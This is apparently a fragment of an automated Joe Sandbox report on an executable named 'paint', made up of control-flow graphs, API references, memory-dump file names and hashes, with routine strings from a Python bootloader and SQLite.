7ff6f0bebce5-7ff6f0bebcf5 1500->1510 1501->1498 1502->1489 1504->1498 1512 7ff6f0bebde5-7ff6f0bebdf0 1504->1512 1506->1504 1507->1502 1510->1465 1517 7ff6f0bebdf2-7ff6f0bebe0b call 7ff6f0beb6e4 1512->1517 1518 7ff6f0bebe17-7ff6f0bebe1f 1512->1518 1525 7ff6f0bebe10-7ff6f0bebe12 1517->1525 1521 7ff6f0bebe21-7ff6f0bebe33 1518->1521 1522 7ff6f0bebe9b-7ff6f0bebea8 call 7ff6f0beb524 1518->1522 1526 7ff6f0bebe35 1521->1526 1527 7ff6f0bebe8e-7ff6f0bebe96 1521->1527 1522->1525 1525->1498 1529 7ff6f0bebe3a-7ff6f0bebe41 1526->1529 1527->1498 1530 7ff6f0bebe43-7ff6f0bebe47 1529->1530 1531 7ff6f0bebe7d-7ff6f0bebe88 1529->1531 1532 7ff6f0bebe63 1530->1532 1533 7ff6f0bebe49-7ff6f0bebe50 1530->1533 1531->1527 1535 7ff6f0bebe69-7ff6f0bebe79 1532->1535 1533->1532 1534 7ff6f0bebe52-7ff6f0bebe56 1533->1534 1534->1532 1536 7ff6f0bebe58-7ff6f0bebe61 1534->1536 1535->1529 1537 7ff6f0bebe7b 1535->1537 1536->1535 1537->1527
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                                                                                                                                                                                • Instruction ID: 73fb2b25bce6f392b6c5ee5329a1ff902d42fe0b2e44128e6a0fe611d107e5b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CC1E522A0C687E1E7608B159440ABE77A4EF82B80FD54171EA6F837D1EF7EE8558740

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1615 7ffdfb098ff0-7ffdfb099002 1616 7ffdfb099017-7ffdfb09901a 1615->1616 1617 7ffdfb099004-7ffdfb099015 call 7ffdfb069350 1615->1617 1618 7ffdfb09901c-7ffdfb099032 call 7ffdfb069350 1616->1618 1619 7ffdfb099034 1616->1619 1625 7ffdfb09903a-7ffdfb099070 call 7ffdfb069350 1617->1625 1622 7ffdfb099036-7ffdfb099038 1618->1622 1619->1622 1622->1625 1626 7ffdfb099071-7ffdfb099085 1622->1626 1628 7ffdfb099087 1626->1628 1629 7ffdfb09908d-7ffdfb099090 call 7ffdfb098d60 1626->1629 1628->1629 1632 7ffdfb099095-7ffdfb09909a 1629->1632 1633 7ffdfb0990a0-7ffdfb0990a5 1632->1633 1634 7ffdfb0991bf-7ffdfb0991cb 1632->1634 1637 7ffdfb0990b0-7ffdfb0990b7 1633->1637 1635 7ffdfb0991cd 1634->1635 1636 7ffdfb0991d3-7ffdfb0991e1 1634->1636 1635->1636 1638 7ffdfb0991ba 1637->1638 1639 7ffdfb0990bd-7ffdfb0990cd call 7ffdfb0e54c0 1637->1639 1638->1634 1642 7ffdfb0990f6-7ffdfb099100 1639->1642 1643 7ffdfb0990cf-7ffdfb0990d9 call 7ffdfb097ee0 1639->1643 1645 7ffdfb099107-7ffdfb09911c 1642->1645 1646 7ffdfb099102-7ffdfb099105 1642->1646 1653 7ffdfb0990db 1643->1653 1654 7ffdfb0990e2-7ffdfb0990ef call 7ffdfb098d60 1643->1654 1649 7ffdfb09912a-7ffdfb09912d 1645->1649 1650 7ffdfb09911e-7ffdfb099122 1645->1650 1648 7ffdfb09913e-7ffdfb099148 1646->1648 1655 7ffdfb09914a-7ffdfb09914d call 7ffdfb066400 1648->1655 1656 7ffdfb099152-7ffdfb099156 1648->1656 1651 7ffdfb09912f-7ffdfb099132 1649->1651 1652 7ffdfb099134-7ffdfb09913b call 7ffdfb091530 1649->1652 1650->1649 1657 7ffdfb099124-7ffdfb099128 1650->1657 1651->1648 1652->1648 1653->1654 1654->1637 1668 7ffdfb0990f1 1654->1668 1655->1656 1661 7ffdfb099158-7ffdfb09915b 1656->1661 1662 7ffdfb0991ab-7ffdfb0991b7 1656->1662 1657->1648 1665 7ffdfb09915d 1661->1665 1666 7ffdfb099192-7ffdfb0991a9 call 7ffdfb066d20 1661->1666 1662->1638 1669 7ffdfb099164-7ffdfb09916d 1665->1669 1666->1638 1668->1638 1669->1669 1671 7ffdfb09916f-7ffdfb099181 call 7ffdfb066880 1669->1671 1671->1666 1674 7ffdfb099183-7ffdfb09918d 00007FFE1A463010 1671->1674 1674->1666
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFB0DD120), ref: 00007FFDFB09918D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3538577999
                                                                                                                                                                                                                                                                • Opcode ID: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
                                                                                                                                                                                                                                                                • Instruction ID: 5d024da85a8c67f861d81da007607f10dd6bdb5610145622bb780fd27aa52eae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6519022B0F69385FB149B11D835AB96392BF86B98F484135DA7D073FDDE2CE442A340
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                • Opcode ID: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
                                                                                                                                                                                                                                                                • Instruction ID: 000d3c0ba2a76c19acdfa3f92c70f1ba62d85c5c89aa60ed4ccaf1b4f31aef85
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04418025A19687B1EB21DB64E4152E9A326FF56344FC00132EA6E837D6FF3DE505C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                                • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                                                • Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                                                • Instruction ID: aa6497b053ff5a2fa05fc76d44aa7e830e98277b1f477c277abf5d5b64df4b93
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C028F62F0A68386FB558F11B870EB9A3A0FF85B58F144235D96E826F8DF3CE4459704
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010$FileRead
                                                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                                • API String ID: 2600561947-1843600136
                                                                                                                                                                                                                                                                • Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                                                • Instruction ID: 9bc9173a1978978915c82bd02e99611a0ed9a115545c0f38349ff22cf08203b5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1441F032F0D64789E7108F15A855DB97766FB55788F044232EA6D836FCDE3CE5429340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                                • Instruction ID: 4f3525148bb14eb7aed24629eabfcecfb341625919f94f8df42d5689f98b04ac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4512672F08116AAEB14CF74D9516BC27A6AB0135AF914175DE2FD2BE5EF39E401C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                • Opcode ID: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
                                                                                                                                                                                                                                                                • Instruction ID: 7af00b50604d72ab9806f2ae3be5013dec9a51a9a07b75e2a7c470dc233a74e0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951AC26E086419AFB10DFB1D4603BD23A1AB4AB98F948535DE2E977C9EF39D4418700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                • Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                                                                                                                                                                                • Instruction ID: cccca9982455505907bd609a329f278d3302aa75bf3c049b2fc4fda44ec7def4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1441B322D1C78293E7508B6095203797360FB96764F509374EAAE43BD2EF7DA5E08740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                • Instruction ID: 8e4c4bb0909cf8ca5eaa2e81ded4e2c9b6fae10a0641351acb7612431c8c09b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20313C25E0E14372FB64AB6498653B997939F47384FC44435E96FC73D3FE2EA40A8240
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                • Instruction ID: bddd2f935531eea7d3dd973352540b6ca21a799fa271a0e8de2467b77e01a76e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35516061B1924256F7288E659C0067E62D1BF46BA4F944730EE7FC77C5EF3ED4818600
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                • Instruction ID: a1ad9a8724109884aa36773a5892bb64cecb199cb843368319e60c6aae050607
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F511E362718B8291DB108B25B804169A761FB46BF4FE44331EE7E8B7E9EF3DD0128700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BE58A9), ref: 00007FF6F0BE59C7
                                                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BE58A9), ref: 00007FF6F0BE59DD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                                                                • Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                                                                                                                                                                                • Instruction ID: 10a3da9776fe792003fb79869f32e99326e3dfa7cfe6ef04e09f855515ad4025
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6119E7261C60692EB548B50A45117AB7A0FB86771FA01336FAEEC2BD8FF6DD014CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC36
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC40
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
